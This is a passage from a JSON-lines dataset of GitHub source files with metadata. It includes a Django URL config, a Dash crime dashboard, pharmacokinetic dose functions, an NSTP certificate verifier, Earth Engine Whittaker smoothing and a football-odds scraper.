name='register'),\r\n path('', TaskList.as_view(), name='tasks'),\r\n\r\n path('task/', TaskDetail.as_view(), name='task'),\r\n path('task-create/', TaskCreate.as_view(), name='task-create'),\r\n path('habit-create/', HabitCreate.as_view(), name='habit-create'),\r\n path('event-create/', EventCreate.as_view(), name='event-create'),\r\n\r\n path('task-edit/', TaskUpdate.as_view(), name='task-update'),\r\n path('habit-edit/', HabitUpdate.as_view(), name='habit-update'),\r\n path('event-edit/', EventUpdate.as_view(), name='event-update'),\r\n\r\n path('task-delete/', DeleteTask.as_view(), name='task-delete'),\r\n path('habit-delete/', DeleteHabit.as_view(), name='habit-delete'),\r\n path('event-delete/', DeleteEvent.as_view(), name='event-delete'),\r\n\r\n path('calendar///', calendar_view, name='calendar'),\r\n]","repo_name":"Bartkosa/online-pinboard","sub_path":"todo_list/base/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"34856023021","text":"# load library\nimport dash\nfrom dash import dcc\nfrom dash import html\nimport pandas as pd\nimport plotly.graph_objs as go\nimport plotly.express as px\nimport dash_bootstrap_components as dbc\n\n# Load data\ndf = pd.read_csv(\"data/processed_communities.csv\")\n\n# Select only columns with numerical values\ncolumn_list = {\"latitude\": \"Latitude\",\n \"longitude\": \"Longitude\",\n \"population\": \"Population\",\n \"PopDens\": \"Population Density\",\n \"racepctblack\": \"Black Race Percentage\",\n \"racePctWhite\": \"White Race Percentage\",\n \"racePctAsian\": \"Asian Race Percentage\",\n \"agePct12t29\": \"Age Percentage (12-29)\",\n \"agePct65up\": \"Age Percentage (65+)\",\n \"medIncome\": \"Median Income\",\n \"violent_crime_rate\": \"Violent Crime Rate\",\n \"NumStreet\": \"Number of Streets\",\n \"PctUnemployed\": \"Unemployed Percentage\"\n }\ndf = df[column_list]\n\n# rename colunms\ndf = df.rename(columns = column_list)\n\n# Define app and layout\napp = dash.Dash(__name__, external_stylesheets = [dbc.themes.SOLAR])\n\napp.layout = dbc.Container(\n [\n dbc.Row(\n [\n dbc.Col(\n [\n html.H1(\"Explore Crime Rate With Different Factors\"),\n dcc.Dropdown(\n id = \"scatter-x\",\n options = [{\"label\": colname, \"value\": colname} for colname in df.columns],\n value = \"Population\"\n ),\n dcc.Dropdown(\n id = \"scatter-y\",\n options = [{\"label\": colname, \"value\": colname} for colname in df.columns],\n value = \"Violent Crime Rate\"\n ),\n dcc.Graph(id = \"scatter-plot\")\n ],\n md = 6,\n ),\n dbc.Col(\n [\n dcc.Dropdown(\n id = \"correlation-column\",\n options = [{\"label\": colname, \"value\": colname} for colname in df.columns],\n value = \"Population\"\n ),\n html.Table(id = \"correlation-table\")\n ],\n md = 6,\n ),\n ]\n )\n ],\n fluid = True,\n)\n\n# Define callbacks\n@app.callback(\n dash.dependencies.Output(\"scatter-plot\", \"figure\"),\n [dash.dependencies.Input(\"scatter-x\", \"value\"),\n dash.dependencies.Input(\"scatter-y\", \"value\")]\n)\n\n# Scatter plot\ndef update_scatter_plot(xcol, ycol):\n fig = px.scatter(df, x = xcol, y = ycol)\n return fig\n\n@app.callback(\n dash.dependencies.Output(\"correlation-table\", \"children\"),\n [dash.dependencies.Input(\"correlation-column\", \"value\")]\n)\n\n# Correlation table\ndef update_correlation_table(col):\n corr_df = df.corr()[col].reset_index()\n corr_df.columns = [\"Column\", \"Correlation\"]\n corr_df = corr_df.round(3)\n corr_table = [html.Tr([html.Th(\"Column\"), html.Th(\"Correlation\")])]\n for i in range(len(corr_df)):\n corr_table.append(html.Tr([\n html.Td(corr_df.iloc[i][\"Column\"]),\n html.Td(corr_df.iloc[i][\"Correlation\"])\n ]))\n return corr_table\n\n# Run app\nif __name__ == '__main__':\n app.run_server(debug=True)","repo_name":"wakesyracuse7/Communites_and_Crime_dash","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4368380695","text":"import numpy as np\n\n\nclass GaussConvFn():\n \"\"\"\n This class represents the convolution of a delta function with Gaussian function\n By Gaussian function we mean the pdf of Gaussian distribution.\n The purpose of this function is build up a smooth function which is close to a delta function,\n and enable the numerical solution of ODE using Runge-Kutta method.\n Formally, Let us denote \\rho(t)=A * \\delta(t-t_center), where A is the magnitude\n \\omega(t) = \\int \\frac{1}{\\sqrt{2\\pi}\\sigma}e^{-\\frac{t^2}{2\\sigma^2}},\n then this class just represent \\rho * \\omega (t), where * is the convolution.\n See the definition in https://en.wikipedia.org/wiki/Convolution for more information.\n \"\"\" \n def __init__(self, center: float, magnitude: float, sigma=0.02):\n \"\"\"\n params:\n center: t_center\n magnitude: magnitude in the delta function\n sigma: sigma in the pdf of Gaussian distribution.\n\n Note that sigma could not be too small, otherwise ODE solving might fail using Runge-Kutta method.\n \"\"\"\n self.center = center\n self.magnitude = magnitude\n self.sigma = sigma\n\n def eval_at(self, x: float) -> float:\n '''\n Return the value of this function at x.\n '''\n return self.magnitude / (2 * np.pi) ** 0.5 / self.sigma * np.exp(-(x - self.center)**2 / (2 * self.sigma ** 2))\n\n\nclass DoseFn():\n\n \"\"\"\n This class represents the dose function in the ODE.\n The dose function DOSE(t) should be a linear combination of several pseudo delta function(see GaussConvFn),\n plus a constant value.\n It represents consist of instantaneous doses of X ng of the drug at one or more time points,\n or a steady application of X ng per hour over a given time period, or some combination.\n\n Building up an object needs to specify:\n the stead application dose (constinput)\n A list of instantaneous dosing time and quantity (centerpoints & magnitudes)\n \"\"\"\n \n def __init__(self, constinput=0, centerpoints=None, magnitudes=None):\n '''\n params:\n constinput: the steady dose, by default set to 0\n centerpoints: time point of instantaneous doses, should be a list\n magnitudes: amount of instantaneous doses, should be a list (length equal to centerpoints)\n '''\n\n self.constinput = constinput\n self.deltainput = []\n if centerpoints is not None:\n if len(centerpoints) == len(magnitudes):\n for i in range(len(centerpoints)):\n self.deltainput.append(GaussConvFn(centerpoints[i], magnitudes[i]))\n else:\n raise ValueError('The length of centerpoints and magnitudes list should be the same!')\n\n def eval_at(self, x):\n '''\n Return the dose function value at x\n '''\n \n result = self.constinput\n for i in range(len(self.deltainput)):\n result += self.deltainput[i].eval_at(x)\n\n return result\n","repo_name":"laraherriott/PK-project","sub_path":"pkmodel/dose.py","file_name":"dose.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"32191303639","text":"# -*- coding: iso-8859-15 -*-\n\nimport tornado.web\nimport tornado.escape\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass UsersHandler(tornado.web.RequestHandler):\n def initialize(self, db=None):\n self.db = db\n\n # @tornado.gen.coroutine\n async def get(self, _slash, email):\n mongo = self.application.mongo\n db = mongo.prueba\n\n query = {}\n if email is not None:\n query = {\n 'email': email\n }\n\n responses = []\n async for user in db.users.find(query):\n user['_id'] = str(user['_id'])\n responses.append(user)\n\n self.set_header('Content-Type', 'text/javascript')\n self.write(tornado.escape.json_encode(responses))\n # self.render('../static/index.html')\n\n # @tornado.gen.coroutine\n async def post(self, _slash, _email):\n if _email is not None:\n self.set_status(403)\n else:\n data = tornado.escape.json_decode(self.request.body)\n db = self.application.mongo.prueba\n\n logger.info(f'Body keys: {list(data.keys())}')\n logger.info(f\"data[key2] = {data['key2']}\")\n\n insert_id = await db.users.insert_one(data)\n self.set_header('Content-Type', 'text/javascript')\n self.write(tornado.escape.json_encode(\n {\"_id\": str(insert_id.inserted_id)}))\n\n async def put(self):\n self.set_status(403)\n","repo_name":"andfoy/tornado-skeleton","sub_path":"server/web/users_handler.py","file_name":"users_handler.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27108895651","text":"from bs4 import BeautifulSoup as BS\nimport re\ndef clean_story(file_name):\n\n\tprint('Processing story ' + file_name)\n\t# extract the basic data out of html flags\n\twith open(file_name) as f:\n\t\tsoup = BS(''.join(f.readlines()), 'html.parser')\n\n\ttitle = soup.title.text\n\tstory = ''\n\n\tnumber_of_skips = 1\n\n\n\tfor par in soup.find_all('p'):\n\t\tif number_of_skips > 0:\n\t\t\tnumber_of_skips -= 1\n\t\telif not len(par.attrs) and not len(par.contents[0].attrs):\n\t\t\tstory += par.text\n\n\n\t# remove [1] etc for references\n\tstory = re.sub('\\[\\w+]', '', story)\n\n\treturn title, story\n","repo_name":"daphnei/nn_chatbot","sub_path":"rejected/gft/clean_story.py","file_name":"clean_story.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"4899696047","text":"import time\nfrom unittest.mock import Mock, patch\n\nfrom murakami.exporters.http import HTTPExporter\n\nRESPONSE_SUCCESS_JSON = {\n 'status': 'success'\n}\n\nRESPONSE_FAILURE_JSON = {\n 'error': '',\n 'message': ''\n}\n\n@patch('requests.post')\ndef test_push_response_ok(mock_post):\n mock_post.return_value = Mock(ok=True)\n mock_post.return_value.json.return_value = RESPONSE_SUCCESS_JSON\n\n exporter = HTTPExporter(\"test\", config={'url': 'http://testurl'})\n assert exporter.push(\"ndt5\", '{\"TestName\": \"ndt5\"}', time.time()) is True\n\n@patch('requests.post')\ndef test_push_response_error(mock_post):\n mock_post.return_value = Mock(ok=False)\n mock_post.return_value.json.return_value = RESPONSE_FAILURE_JSON\n\n exporter = HTTPExporter(\"test\", config={'url': 'http://testurl'})\n assert exporter.push(\"ndt5\", '{\"TestName\": \"ndt5\"}', time.time()) is False\n","repo_name":"m-lab/murakami","sub_path":"tests/test_http.py","file_name":"test_http.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"40"} +{"seq_id":"70151965880","text":"from datetime import timedelta\nimport logging\nfrom django.test import TestCase\nfrom django.utils import timezone\nfrom apps.dashboard.models.goal import Goal\nfrom apps.dashboard.models.maturity_model import EvaluationType, MaturityModelItem\nfrom apps.dashboard.models.project_maturity_state import ProjectMaturityItemState, ProjectMaturityLevelState\nfrom apps.dashboard.tests.utils import setup_basic_environment\nfrom apps.dashboard.serializers import ProjectMaturityStateSerializer\nfrom apps.dashboard.models import ProjectMaturityState\n\n\nclass ProjectMaturityStateSerializerTest(TestCase):\n def setUp(self) -> None:\n self.env = setup_basic_environment()\n\n def test_project_maturity_state_fields_should_be_present(self):\n project_maturity_state = ProjectMaturityState(self.env.project, [])\n serialized_maturity_state = ProjectMaturityStateSerializer(instance=project_maturity_state).data\n self.assertEqual(serialized_maturity_state[\"name\"],\n self.env.maturity_model.name)\n self.assertEqual(serialized_maturity_state[\"maturity_level_states\"], [])\n self.assertIsNotNone(serialized_maturity_state[\"achieved_level\"])\n self.assertEqual(serialized_maturity_state[\"passed_enabled_items_count\"], 0)\n\n def test_maturity_level_state_fields_should_be_present(self):\n project_maturity_state = ProjectMaturityState(self.env.project,\n [\n ProjectMaturityLevelState(\n self.env.maturity_model_level,\n []\n )\n ])\n serialized_maturity_state = ProjectMaturityStateSerializer(instance=project_maturity_state).data\n maturity_level_states = serialized_maturity_state[\"maturity_level_states\"]\n self.assertEqual(len(maturity_level_states), 1)\n maturity_level_state = maturity_level_states[0]\n self.assertEqual(maturity_level_state[\"id\"], self.env.maturity_model_level.pk)\n self.assertEqual(maturity_level_state[\"name\"], self.env.maturity_model_level.name)\n self.assertEqual(maturity_level_state[\"description\"], self.env.maturity_model_level.description)\n\n def test_maturity_item_state_light_fields_should_be_present(self):\n evaluation_type = EvaluationType.objects.create(kind=EvaluationType.KIND_MANUAL)\n mm_items = [\n MaturityModelItem.objects.create(\n maturity_model_level=self.env.maturity_model_level,\n name=\"1\",\n code=\"T001\",\n evaluation_type=evaluation_type\n ),\n MaturityModelItem.objects.create(\n maturity_model_level=self.env.maturity_model_level,\n name=\"2\",\n code=\"T002\",\n evaluation_type=evaluation_type\n ),\n ]\n goal = Goal.objects.create(\n project=self.env.project,\n due_date=(timezone.now() + timedelta(days=10)).date()\n )\n goal.maturity_model_items.set(mm_items[:1])\n maturity_item_states = [\n ProjectMaturityItemState(\n mm_items[0],\n is_disabled=False,\n is_passed=True,\n closest_goal=goal,\n latest_pending_evaluation_request_id=None,\n latest_pending_toggle_request_id=None\n ),\n ProjectMaturityItemState(\n mm_items[1],\n is_disabled=True,\n is_passed=False,\n closest_goal=None,\n latest_pending_evaluation_request_id=None,\n latest_pending_toggle_request_id=None\n ),\n ]\n project_maturity_state = ProjectMaturityState(self.env.project,\n [\n ProjectMaturityLevelState(\n self.env.maturity_model_level,\n maturity_item_states\n )\n ])\n serialized_maturity_state = ProjectMaturityStateSerializer(instance=project_maturity_state).data\n items = serialized_maturity_state[\"maturity_level_states\"][0][\"maturity_item_states\"]\n self.assertEqual(len(items), 2)\n for i, item_data in enumerate(items):\n logging.debug(f\"Asserting fields of item_data {i}\")\n self.assertEqual(item_data[\"maturity_item\"][\"id\"], maturity_item_states[i].maturity_item.pk)\n self.assertEqual(item_data[\"maturity_item\"][\"code\"], maturity_item_states[i].maturity_item.code)\n self.assertEqual(item_data[\"maturity_item\"][\"name\"], maturity_item_states[i].maturity_item.name)\n self.assertEqual(item_data[\"maturity_item\"][\"evaluation_type\"][\"kind\"], maturity_item_states[i].maturity_item.evaluation_type.kind)\n self.assertEqual(item_data[\"disabled\"], maturity_item_states[i].is_disabled)\n self.assertEqual(item_data[\"latest_pending_evaluation_request_id\"], maturity_item_states[i].latest_pending_evaluation_request_id)\n self.assertEqual(item_data[\"is_passed\"], maturity_item_states[i].is_passed)\n if maturity_item_states[i].closest_goal is None:\n self.assertIsNone(item_data[\"closest_goal\"])\n else:\n self.assertIsNotNone(item_data[\"closest_goal\"])\n","repo_name":"sahabpardaz/nemo","sub_path":"backend/apps/dashboard/tests/test_project_maturity_state_serializer.py","file_name":"test_project_maturity_state_serializer.py","file_ext":"py","file_size_in_byte":5630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"32821029951","text":"\"\"\"PKI interface.\"\"\"\n\nimport datetime\nimport hashlib\nimport logging\nimport struct\nfrom pathlib import Path\n\nfrom nacl.bindings import \\\n crypto_sign_ed25519ph_state, \\\n crypto_sign_ed25519ph_update, \\\n crypto_sign_ed25519ph_final_verify\n\nfrom nstp_v4_pb2 import *\n\n\ndef load_trust_store(path: Path) -> CertificateStore:\n \"\"\"Deserialize a trust store.\"\"\"\n\n store = CertificateStore()\n with path.open(\"rb\") as fd:\n data = fd.read()\n store.ParseFromString(data)\n return store\n\n\ndef load_certificate(path: Path) -> Certificate:\n \"\"\"Deserialize a certificate.\"\"\"\n\n cert = Certificate()\n with path.open(\"rb\") as fd:\n data = fd.read()\n cert.ParseFromString(data)\n return cert\n\n\ndef load_private_key(path: Path) -> PrivateKey:\n \"\"\"Deserialize a private key.\"\"\"\n\n key = PrivateKey()\n with path.open(\"rb\") as fd:\n data = fd.read()\n key.ParseFromString(data)\n return key\n\n\ndef load_certificate_status(path: Path) -> CertificateStatusResponse:\n \"\"\"Deserialize a certificate status response.\"\"\"\n\n status = CertificateStatusResponse()\n with path.open(\"rb\") as fd:\n data = fd.read()\n status.ParseFromString(data)\n return status\n\n\ndef hash_certificate_sha256(cert: Certificate) -> CertificateHash:\n h = hashlib.sha256()\n return hash_certificate(cert, h, HashAlgorithm.SHA256)\n\n\ndef hash_certificate_sha512(cert: Certificate) -> CertificateHash:\n h = hashlib.sha512()\n return hash_certificate(cert, h, HashAlgorithm.SHA512)\n\n\nclass CertificateVerifier(object):\n \"\"\"Certificate verifier.\"\"\"\n\n # TODO: Add pinned certs\n def __init__(self, trust_store: CertificateStore) -> None:\n \"\"\"Initializer.\"\"\"\n\n # Hash all trusted certs\n self.trusted_certs = {}\n for c in trust_store.certificates:\n self.trusted_certs[hash_certificate_sha256(c).value] = c\n self.trusted_certs[hash_certificate_sha512(c).value] = c\n\n def verify_certificate(self, cert: Certificate, usage: CertificateUsage) -> None:\n \"\"\"Verify a certificate against a trust store.\"\"\"\n\n # Check the validity window and usage\n now = datetime.datetime.now().timestamp()\n if now < cert.valid_from or now >= cert.valid_from + cert.valid_length:\n raise Exception(\"current timestamp is outside certificate validity window\")\n if usage not in cert.usages:\n raise Exception(\"not a server certificate\")\n\n # Find the issuer cert\n if not cert.HasField(\"issuer\"):\n raise Exception(\"no issuer\")\n ca_cert = self.trusted_certs.get(cert.issuer.value)\n if ca_cert is None:\n raise Exception(\"unknown issuer\")\n\n # Check the issuer's validity window and usage\n if now < ca_cert.valid_from or now >= ca_cert.valid_from + ca_cert.valid_length:\n raise Exception(\"current timestamp is outside CA certificate validity window\")\n if CertificateUsage.CERTIFICATE_SIGNING not in ca_cert.usages:\n raise Exception(\"not a CA certificate\")\n\n # Verify the issuer signature\n state = crypto_sign_ed25519ph_state()\n self._certificate_signature_state(state, cert, False)\n crypto_sign_ed25519ph_final_verify(state, cert.issuer_signature, ca_cert.signing_public_key)\n\n def verify_server_certificate(self, cert: Certificate, subject: str) -> None:\n \"\"\"Verify a server certificate.\"\"\"\n\n logging.debug(\"verifying server certificate\")\n self.verify_certificate(cert, CertificateUsage.SERVER_AUTHENTICATION)\n if all([x != subject for x in cert.subjects]):\n raise Exception(\"subject mismatch\")\n\n def verify_status_certificate(self, status_cert: Certificate, subject: str) -> None:\n \"\"\"Verify a status certificate.\"\"\"\n\n logging.debug(\"verifying status certificate\")\n self.verify_certificate(status_cert, CertificateUsage.STATUS_SIGNING)\n if all([x != subject for x in status_cert.subjects]):\n raise Exception(\"subject mismatch\")\n\n def verify_server_certificate_status(self,\n cert: Certificate,\n status: CertificateStatusResponse,\n status_subject: str) -> None:\n \"\"\"Verify a server certificate status against a trust store.\"\"\"\n\n logging.debug(\"verifying server certificate status\")\n\n # Check that the status hash matches\n if status.certificate.algorithm == HashAlgorithm.SHA256:\n cert_hash = hash_certificate_sha256(cert)\n elif status.certificate.algorithm == HashAlgorithm.SHA512:\n cert_hash = hash_certificate_sha512(cert)\n else:\n raise Exception(f\"unsupported hash algorithm {status.certificate.algorithm}\")\n\n if cert_hash.value != status.certificate.value:\n raise Exception(\"certificate and status response mismatch\")\n\n # Check the validity window\n now = datetime.datetime.now().timestamp()\n if now < status.valid_from or now >= status.valid_from + status.valid_length:\n raise Exception(\"current timestamp is outside status validity window\")\n\n # Check the status certificate\n self.verify_status_certificate(status.status_certificate, status_subject)\n\n # Verify the status signature\n state = crypto_sign_ed25519ph_state()\n self._status_signature_state(state, status)\n crypto_sign_ed25519ph_final_verify(state, status.status_signature, status.status_certificate.signing_public_key)\n\n # Finally, check the actual status\n if status.status != CertificateStatus.VALID:\n raise Exception(f\"certificate is not valid (status={status.status}\")\n\n @staticmethod\n def _certificate_signature_state(state, cert: Certificate, include_signature: bool) -> None:\n \"\"\"Collect signature state over a certificate.\"\"\"\n\n for s in cert.subjects:\n crypto_sign_ed25519ph_update(state, s.encode(\"UTF-8\"))\n crypto_sign_ed25519ph_update(state, struct.pack(\">Q\", cert.valid_from))\n crypto_sign_ed25519ph_update(state, struct.pack(\">I\", cert.valid_length))\n for u in cert.usages:\n if u == CertificateUsage.CERTIFICATE_SIGNING:\n crypto_sign_ed25519ph_update(state, bytes([0]))\n elif u == CertificateUsage.CLIENT_AUTHENTICATION:\n crypto_sign_ed25519ph_update(state, bytes([1]))\n elif u == CertificateUsage.SERVER_AUTHENTICATION:\n crypto_sign_ed25519ph_update(state, bytes([2]))\n elif u == CertificateUsage.STATUS_SIGNING:\n crypto_sign_ed25519ph_update(state, bytes([3]))\n else:\n raise Exception(f\"invalid certificate usage {u}\")\n crypto_sign_ed25519ph_update(state, cert.encryption_public_key)\n crypto_sign_ed25519ph_update(state, cert.signing_public_key)\n\n if cert.HasField(\"issuer\"):\n crypto_sign_ed25519ph_update(state, cert.issuer.value)\n if cert.issuer.algorithm == HashAlgorithm.SHA256:\n crypto_sign_ed25519ph_update(state, bytes([1]))\n elif cert.issuer.algorithm == HashAlgorithm.SHA512:\n crypto_sign_ed25519ph_update(state, bytes([2]))\n else:\n raise Exception(f\"unsupported hash algorithm {cert.issuer.algorithm}\")\n\n if include_signature:\n crypto_sign_ed25519ph_update(state, cert.issuer_signature)\n\n @staticmethod\n def _status_signature_state(state, status: CertificateStatusResponse) -> None:\n \"\"\"Collect signature state over a status.\"\"\"\n\n CertificateVerifier._certificate_hash_signature_state(state, status.certificate)\n if status.status == CertificateStatus.UNKNOWN:\n crypto_sign_ed25519ph_update(state, bytes([0]))\n elif status.status == CertificateStatus.VALID:\n crypto_sign_ed25519ph_update(state, bytes([1]))\n elif status.status == CertificateStatus.INVALID:\n crypto_sign_ed25519ph_update(state, bytes([2]))\n else:\n raise Exception(f\"invalid certificate status {status.status}\")\n\n crypto_sign_ed25519ph_update(state, struct.pack(\">Q\", status.valid_from))\n crypto_sign_ed25519ph_update(state, struct.pack(\">I\", status.valid_length))\n\n CertificateVerifier._certificate_signature_state(state, status.status_certificate, True)\n\n @staticmethod\n def _certificate_hash_signature_state(state, cert: CertificateHash) -> None:\n \"\"\"Collect signature state over a certificate hash.\"\"\"\n\n crypto_sign_ed25519ph_update(state, cert.value)\n if cert.algorithm == HashAlgorithm.SHA256:\n crypto_sign_ed25519ph_update(state, bytes([1]))\n elif cert.algorithm == HashAlgorithm.SHA512:\n crypto_sign_ed25519ph_update(state, bytes([2]))\n else:\n raise Exception(f\"unsupported hash algorithm {cert.algorithm}\")\n\n\ndef hash_certificate(cert: Certificate, h, a: HashAlgorithm) -> CertificateHash:\n \"\"\"Hash a certificate using SHA-256.\"\"\"\n\n for s in cert.subjects:\n h.update(s.encode(\"UTF-8\"))\n h.update(struct.pack(\">Q\", cert.valid_from))\n h.update(struct.pack(\">I\", cert.valid_length))\n for u in cert.usages:\n if u == CertificateUsage.CERTIFICATE_SIGNING:\n h.update(bytes([0]))\n elif u == CertificateUsage.CLIENT_AUTHENTICATION:\n h.update(bytes([1]))\n elif u == CertificateUsage.SERVER_AUTHENTICATION:\n h.update(bytes([2]))\n elif u == CertificateUsage.STATUS_SIGNING:\n h.update(bytes([3]))\n else:\n raise Exception(f\"unknown certificate usage {u}\")\n h.update(cert.encryption_public_key)\n h.update(cert.signing_public_key)\n\n if cert.HasField(\"issuer\"):\n h.update(cert.issuer.value)\n if cert.issuer.algorithm == HashAlgorithm.SHA256:\n h.update(bytes([1]))\n elif cert.issuer.algorithm == HashAlgorithm.SHA512:\n h.update(bytes([2]))\n else:\n raise Exception(f\"unsupported hash algorithm {cert.issuer.algorithm}\")\n\n h.update(cert.issuer_signature)\n\n x = CertificateHash()\n x.value = h.digest()\n x.algorithm = a\n return x\n","repo_name":"aayushkubitkar/NSTP-Content-Security","sub_path":"nstp/pki.py","file_name":"pki.py","file_ext":"py","file_size_in_byte":10312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74576654519","text":"title = ''' Kiểm tra 2 list có phần tử chung hay không.'''\n\nmy_crush = [1, 'Taiwan', 'Student', 'Beauty', 'Talent']\nme = [0, 'VietNam', 'Student']\n\nprint(f'BT7:{title}\\n')\nprint('Input:')\nprint(f'\\t\\tMy Cush = {my_crush}')\nprint(f'\\t\\tMe = {me}')\nsame = []\n\nfor i in my_crush:\n for j in me:\n if i in same:\n break\n elif i == j:\n same.append(i)\n\nprint('--------------')\nprint(f'Output: {same}')\n\n","repo_name":"nmnhat211/python-core","sub_path":"off_general_exercises/off_exer4/exer7.py","file_name":"exer7.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72838704761","text":"# library to apply whittaker smoothing to a image collection having images with\n# continous data\n#\n# function takes image collection [type ee.ImageCollection],\n# whether data is compositional [type boolean] (optional, default false)\n# and lambda [type integer] (optional, default 5)\n# images in collection must have property 'system:time_start'\n#\n# returns a corresponding image collection with temporally smoothened images\n# and a rmse images which has pixelwise rmse for each band\n#\n# published functions are 'whittakerSmoothing'\n#\n# --------------------------------------------------------------------\n# Managing Imports\nfrom utils import *\nimport ee\nee.Initialize()\n\n# Function to compute the inverse log ratio of a regression results to\n# transform back to percent units\ndef inverseLogRatio(image):\n bands = image.bandNames()\n ilrImage = ee.Image(100).divide(ee.Image(1).add(image.exp())).rename(bands)\n return ilrImage\n\ndef whittakerSmoothing(imageCollection, isCompositional = False, lamb = 5):\n # quick configs to set defaults\n def toFl(image):\n return image.toFloat()\n\n # procedure start\n ic = imageCollection.map(toFl)\n\n dimension = ic.size()\n identity_mat = ee.Array.identity(dimension)\n difference_mat = getDifferenceMatrix(identity_mat,3)\n difference_mat_transpose = difference_mat.transpose()\n lamda_difference_mat = difference_mat_transpose.multiply(lamb)\n res_mat = lamda_difference_mat.matrixMultiply(difference_mat)\n hat_matrix = res_mat.add(identity_mat)\n\n # backing up original data\n original = ic\n\n def getProperties(image):\n return ee.Image(image).toDictionary()\n\n # get original image properties\n properties = ic.toList(10000).map(getProperties)\n\n\n # if data is compositional\n # calculate the logratio of an image between 0 and 100. First\n # clamps between delta and 100-delta, where delta is a small positive value.\n if (isCompositional):\n\n def clampImage(image):\n delta = 0.001\n bands = image.bandNames()\n image = image.clamp(delta,100-delta)\n image = (ee.Image.constant(100).subtract(image)).divide(image).log().rename(bands)\n return image\n\n ic = ic.map(clampImage)\n\n arrayImage = original.toArray()\n coeffimage = ee.Image(hat_matrix).updateMask(arrayImage.mask())\n smoothImage = coeffimage.matrixSolve(arrayImage.unmask(hat_matrix.multiply(0)))\n\n def getImageId(image):\n return ee.Image(image).id()\n\n idlist = ic.toList(10000).map(getImageId)\n\n bandlist = ee.Image(ic.first()).bandNames()\n\n flatImage = smoothImage.arrayFlatten([idlist,bandlist])\n smoothCollection = ee.ImageCollection(unpack(flatImage, idlist, bandlist))\n\n if (isCompositional):\n smoothCollection = smoothCollection.map(inverseLogRatio)\n\n def addSuffix(band):\n return ee.String(band).cat('_fitted')\n\n # get new band names by adding suffix fitted\n newBandNames = bandlist.map(addSuffix)\n\n # rename the bands in smoothened images\n smoothCollection = smoothCollection.select(bandlist, newBandNames)\n\n # a really dumb way to loose the google earth engine generated ID so that the two\n # images can be combined for the chart\n dumbimg = arrayImage.arrayFlatten([idlist,bandlist])\n dumbcoll = ee.ImageCollection(unpack(dumbimg,idlist, bandlist))\n outCollection = dumbcoll.combine(smoothCollection)\n\n outCollList = outCollection.toList(10000)\n def addPropBack(image):\n return ee.Image(image).set(properties.get(outCollList.indexOf(image)))\n\n outCollectionProp = outCollList.map(addPropBack)\n\n residue_sq = smoothImage.subtract(arrayImage).pow(ee.Image(2)).divide(dimension)\n rmse_array = residue_sq.arrayReduce(ee.Reducer.sum(),[0]).pow(ee.Image(1/2))\n\n rmseImage = rmse_array.arrayFlatten([[\"rmse\"],bandlist])\n\n return (ee.ImageCollection(outCollectionProp), rmseImage)\n # return ee.ImageCollection.fromImages(outCollectionProp)\n\n# --------------------------------------------------------------------\n# Author: Nishanta Khanal\n# Organization: ICIMOD\n# Contact: nkhanal@icimod.org\n# --------------------------------------------------------------------\n","repo_name":"banmedo/RLCMS_test","sub_path":"Smoothing/WhittakerSmoothing.py","file_name":"WhittakerSmoothing.py","file_ext":"py","file_size_in_byte":4194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2954207431","text":"from bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom typing import *\nimport requests\nimport time\nimport os\nimport json\nimport datetime\n\nimport config\n\n\nchampionships: Dict[str, str] = {\n \"seriea\": \"https://www.diretta.it/serie-a/\",\n \"bundesliga\": \"https://www.diretta.it/calcio/germania/bundesliga/\",\n \"premierleague\": \"https://www.diretta.it/calcio/inghilterra/premier-league/\",\n \"ligue1\": \"https://www.diretta.it/calcio/francia/ligue-1/\",\n \"eredivisie\": \"https://www.diretta.it/calcio/olanda/eredivisie/\",\n \"laliga\": \"https://www.diretta.it/calcio/spagna/primera-division/\"\n}\n\n\nclass Match:\n def __init__(self, match_id, date, time, home_team, away_team, odd1, oddX, odd2):\n self.match_id = match_id\n self.date = date\n self.time = time\n self.home_team = home_team\n self.away_team = away_team\n self.odd1 = odd1\n self.oddX = oddX\n self.odd2 = odd2\n\n def __str__(self):\n return f\"{self.home_team} - {self.away_team} ({self.date} {self.time})\"\n\n def __repr__(self):\n return self.__str__()\n\n\ndef get_soup(url, driver: webdriver.Firefox = None):\n # get the html\n if driver is None:\n browser = get_driver(config.browser)\n else:\n browser = driver\n browser.get(url)\n html = browser.page_source\n # return the soup\n return BeautifulSoup(html, 'html.parser')\n\n\ndef get_matches(soup, target_round: int = None, driver: webdriver.Firefox = None) -> List[Match]:\n # get the matches\n round: int = 0\n matches = []\n\n page = soup.find(\"div\", class_='sportName')\n for child in page.find_all(\"div\"):\n if child.attrs['class'][0] == 'event__round':\n round = int(child.text.split(\" \")[1])\n if target_round is None:\n target_round = round\n elif target_round == round:\n if child.attrs['class'][0] == 'event__match':\n match_id = child.attrs['id'][4:]\n odd1, oddX, odd2 = get_odds(match_id, driver=driver)\n time = child.find(\"div\", class_='event__time').text\n date, time = time.split(\" \")\n home_team = child.find(\n \"div\", class_='event__participant event__participant--home').text\n away_team = child.find(\n \"div\", class_='event__participant event__participant--away').text\n matches.append(\n Match(match_id, date, time, home_team, away_team, odd1, oddX, odd2))\n # return the matches\n return matches, target_round\n\n\ndef get_odds(match_id: str, driver: webdriver.Firefox = None) -> Tuple[float, float, 